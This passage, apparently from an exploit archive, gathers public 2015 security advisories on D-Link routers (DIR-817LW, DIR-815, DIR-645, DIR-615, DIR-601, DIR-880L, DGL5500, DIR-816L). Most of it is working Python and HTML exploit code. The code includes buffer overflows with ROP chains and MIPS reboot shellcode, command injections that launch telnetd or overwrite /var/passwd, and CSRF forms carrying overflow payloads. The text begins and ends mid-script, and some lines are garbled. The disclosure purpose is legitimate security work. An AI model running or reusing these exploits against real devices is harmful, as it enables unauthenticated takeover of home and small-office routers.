buf+="C"*36
buf+="\x2A\xAC\xD5\xB4" # ROP3 (Fills in S4 the address of SP+16 and then jumps to ROP4 which calls SP+16 stored in S4)
buf+="C"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #Reboot shellcode Big endian
buf+="B"*28+"\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# CSRF or any other trickery, but probably only works when connected to network I suppose for v2.02
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley

View file

@ -0,0 +1,106 @@
## Advisory Information
Title: DIR-817LW Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-817LW -- Wireless AC750 Dual Band Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed.
## Details
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Reboot shellcode in there
buf = "GET /dws/api/Login?id="
buf+="A"*2064+"AAAA" #s0 # uclibc system address
buf+="\x2A\xAF\xD0\x84" #s1 -- points to iret
buf+="\x2A\xB1\x4D\xF0" #s2 -- points to sleep
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB0\xDE\x54" # s6 filled up with pointer to rop4 which is ultimate mission
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xAC\xAD\x70" # Retn address ROP gadget 1 that loads into $a0
buf+="C"*36 #
buf+="\x2A\xAC\xD5\xB4" # points to rop3
#buf+="1"*17 # exit payload
buf+="E"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #reboot big endian
buf+="Y"*120 # ROP gadget 2 that loads into $t9
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nContent-Length:5000\r\n\r\nid="+"A"*5000+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.8", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# Working
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"B"*158
buf+="\x2A\xAF\xD0\x84" #s1 -- points to iret
buf+="\x2A\xB1\x4D\xF0" #s2 -- points to sleep
buf+="AAAA"+"AAAA"+"AAAA" #s3,s4,s5
buf+="\x2A\xB0\xDE\x54" # s6 filled up with pointer to rop4 which is ultimate mission
buf+="AAAA"
buf+="\x2A\xAC\xAD\x70" # Retn address ROP gadget 1 that loads into $a0
buf+="C"*36
buf+="\x2A\xAC\xD5\xB4" # points to rop3
buf+="C"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #reboot big endian shell
buf+="B"*28+"\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.8", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# CSRF or any other trickery, but probably only works when connected to network I suppose and internal
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';echo "<?phpinfo?>" > passwd1.php;telnetd -p 9090;test\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley

View file

@ -0,0 +1,88 @@
## Advisory Information
Title: DIR-815 Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-815 -- Wireless N300 Dual Band Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed.
## Details
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import urllib
import urllib2
# This exploits the auth_main.cgi with read buffer overflow exploit for v2.02
# prequisite is just to have id and password fields in params
url = 'http://192.168.0.1/authentication.cgi'
junk = "A"*1004+"B"*37+"\x58\xf8\x40\x00" # address of system function in executable
junk+="X"*164+'echo "Admin" "Admin" "0" > /var/passwd\x00'+"AAAA"
values = "id=test&password=test&test="+junk
req = urllib2.Request(url, values)
response = urllib2.urlopen(req)
the_page = response.read()
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# format junk+ROP1(have right value in A0) + ROP2(add or subtract to create right system address) + ROP3(Jump to right address)
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"H"*286
buf+= "\x40\xF4\xB1\x2A" # (ROP gadget which puts right value in A0)
buf+= "B"*20+"ZZZZ"+"telnetd -p 6778"+"C"*5 # adjustment to get to the right payload
buf+="\xA0\xb2\xb4\x2a" # The system address is 2Ab4b200 so changing that in GDB just before jumping to test if it works which it does not
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Command injection in
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# CSRF or any other trickery, but probably only works when connected to network I suppose
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 99.249.143.124\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.1", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley

View file

@ -0,0 +1,77 @@
## Advisory Information
Title: Dlink DIR-645 UPNP Buffer Overflow
Vendors contacted: William Brown <william.brown@dlink.com> (Dlink)
Release mode: Released
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-645 -- Whole Home Router 1000 from Dlink. Mainly used by home and small offices.
## Vulnerabilities Summary
I have come across 2 security issues in DIR-645 firmware which allows an attacker on wireless LAN and possibly WAN network to execute command injection and buffer overflow attack against the wireless router. I have provided exploit scripts written in python that give details of the exploits. The buffer overflow does not have a payload at this time, however if you watch the exploit in a debugger, then it can be clearly seen that the payload uses ROP techniques to get to stack payload which is a bunch of C's for now on the stack. It can be replaced with any payload that works on MIPS little endian architecture.
## Details
# Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + 'test;telnetd -p 9656;test\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
# Buffer overflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
exploit_buffer = "POST /HNAP1/ HTTP/1.0\r\nHOST: 10.0.0.1\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";pt;"+"B"*158
exploit_buffer+="C"*50+"Z"*46
exploit_buffer+="\xb4\x67\xb3\x2a"
exploit_buffer+="\xd0\xeb\xb4\x2a"
exploit_buffer+="VVVV"
a
exploit_buffer+="\x7c\xba\xb1\x2a"
exploit_buffer+="K"*16
exploit_buffer+="\x44\x3b\xb0\x2A"
exploit_buffer+="A"*36
exploit_buffer+="\xf0\x5e\xb0\x2A"
exploit_buffer+="H"*16
exploit_buffer+="C"*212+"\r\n" + "1\r\n\r\n"
print "[+] sending exploit_bufferfer size", len(exploit_buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.1", 80))
s.send(exploit_buffer)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* Jan 22, 2015: Vulnerability found by Samuel Huntley by William Brown.
* Feb 15, 2015: Vulnerability is patched by Dlink
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley

View file

@ -0,0 +1,58 @@
## Advisory Information
Title: Dlink DIR-615 Authenticated Buffer overflow in Ping and Send email functionality
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-615 -- Wireless N300 router from Dlink. Mainly used by home and small offices.
## Vulnerabilities Summary
I have come across 2 security issues in DIR-615 firmware which allows an attacker using XSRF attack to exploit buffer overflow vulnerabilities in ping and send email functionality.
## Details
# Ping buffer oberflow
----------------------------------------------------------------------------------------------------------------------
<!-- reboot shellcode Big Endian MIPS-->
<html>
<body>
<form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/ping_response.cgi">
<input type="text" id="html_response_page" name="html_response_page" value="tools_vct.asp&html_response_return_page=tools_vct.asp&action=ping_test&ping_ipaddr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2A%BF%99%F4%2A%C1%1C%30AAAA%2A%BF%8F%04CCCC%2A%BC%9B%9CEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE%2A%BC%BD%90FFFFFFFFFFFFFFFF%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0c&ping=ping"></td>
<input type=submit value="submit">
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------
# Send email buffer overflow
----------------------------------------------------------------------------------------------------------------------
<!-- reboot shellcode Big Endian MIPS-->
<html>
<body>
<form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/send_log_email.cgi">
<input type="text" id="auth_active" name="auth_active" value="testy)%3b&log_email_from=test@test.com&auth_acname=sweetBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBIIII%2A%BF%99%F4%2A%C1%1C%30FFFF%2A%BF%8F%04DDDDCCCCBBBB%2A%BC%9B%9CCCC&auth_passwd=test1)&log_email_server=mail.google.com%3breboat%3b%23%23testAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&log_email_port=25&log_email_sender=ses@gmail.com%3brebolt%3b%23%23teYYYY%2A%BC%BD%90AAAAAAAAAAAAtest%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0cAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&model_name=test&action=send_log_email&test=test"></td>
<input type=submit value="submit">
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley

View file

@ -0,0 +1,49 @@
## Advisory Information
Title: DIR-601 Command injection in ping functionality
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR601 -- Wireless N150 Home Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 1 security issue in DIR601 firmware which allows an attacker to exploit command injection in ping functionality. The user needs to be logged in. After that any attacker on wireless LAN or if mgmt interface is exposed on Internet then an internet attacker can execute the attack. Also XSRF can be used to trick administrator to exploit it.
## Details
Command injection in dir-601
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# CMD_INJECTION_INPINGTEST
# Just need user to be logged in and nothing else
buf = "POST /my_cgi.cgi HTTP/1.0\r\n"
buf+="HOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nAccept-Encoding:gzip,deflate,sdch\r\nAccept-Language:en-US,en;q=0.8\r\nContent-Length:101\r\n\r\n"
buf+="request=ping_test&admin3_user_name=admin1;echo admin > /var/passwd1;test&admin4_user_pwd=admin2&user_type=0"+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("IP_ADDRESS", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley

View file

@ -0,0 +1,73 @@
## Advisory Information
Title: DIR-880L Buffer overflows in authenticatio and HNAP functionalities.
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-880L -- Wireless AC1900 Dual-Band Gigabit Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. But it works as the buffer overflow happens in a seperate process than web server which does not allow web server to crash and hence attacker wins.
## Details
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Currently the address of exit function in libraray used as $PC
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
buf = "GET /webfa_authentication.cgi?id="
buf+="A"*408
buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack
buf+="sh;#"+"CCCC"+"DDDD" #R0-R2
buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values
buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address
buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd
buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley

View file

@ -0,0 +1,65 @@
## Advisory Information
Title: DGL5500 Un-Authenticated Buffer overflow in HNAP functionality
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DGL5500 -- Gaming Router AC1300 with StreamBoost. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 1 security issue in DGL5500 firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilitiy in hnap functionality. Does not require any authentication and can be exploited on WAN if the management interface is exposed.
## Details
# HNAP buffer oberflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Although you can access this URL unauthenticated on WAN connection which is great but need a good shellcode. buffer overflow in check_hnap_auth
buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
buf+="FFFF"
buf+="AAAA" #s0
buf+="\x2A\xBF\xB9\xF4" #s1 ROP 2
buf+="\x2A\xC1\x3C\x30" #s2 sleep address
buf+="DDDD" #s3
buf+="\x2A\xC0\xEB\x50" #s4 ROP 4 2AC0EB50
buf+="\x2a\xc0\xf3\xe8" # Retn address 2AC0F3E8 ROP1
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # 36 bytes of gap
buf+="\x2A\xBC\xDB\xD0" # ROP 3
buf+="GGGGGGGGGGGGGGGG"
buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x
buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley

View file

@ -0,0 +1,96 @@
----------------------------------------------------------------------------------------------
Title:
====
D-link wireless router DIR-816L Cross-Site Request Forgery (CSRF) vulnerability
Credit:
======
Name: Bhadresh Patel
Company/affiliation: HelpAG
Website: www.helpag.com
CVE:
=====
CVE-2015-5999
Date:
====
10-11-2015 (dd/mm/yyyy)
Vendor:
======
D-Link is a computer networking company with relatively modest beginnings in Taiwan. The company has grown over the last 25 years into an exciting global brand offering the most up-to-date network solutions. Whether it is to suit the needs of the home consumer, a business or service provider, D-link take pride in offering award-winning networking products and services.
Product:
=======
DIR-816L is a wireless AC750 Dual Band Cloud Router
Product link: http://support.dlink.com/ProductInfo.aspx?m=DIR-816L
Abstract:
=======
Cross-Site Request Forgery (CSRF) vulnerability in the DIR-816L wireless router enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
Report-Timeline:
============
27-07-2015: Vendor notification
27-07-2015: Vendor Response/Feedback
05-11-2015: Vendor Fix/Patch
10-11-2015: Public or Non-Public Disclosure
Affected Version:
=============
<=2.06.B01
Exploitation-Technique:
===================
Remote
Severity Rating:
===================
7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)
Details:
=======
An attacker who lures a DIR-816L authenticated user to browse a malicious website can exploit cross site request forgery (CSRF) to submit commands to DIR-816L wireless router and gain control of the product. The attacker could submit variety of commands including but not limited to changing the admin account password, changing the network policy, etc.
Proof Of Concept:
================
1) User login to DIR-816L wireless router
2) User visits the attacker's malicious web page (attacker.html)
3) attacker.html exploits CSRF vulnerability and changes the admin account password
PoC video link: http://youtu.be/UBdR2sUc8Wg
Exploit code (attacker.html):
<html>
<body>
<iframe style="display:none" name="hiddenpost"></iframe>
<form action="http://192.168.0.1/hedwig.cgi" method="POST" enctype="text/plain" target="hiddenpost" id="csrf">
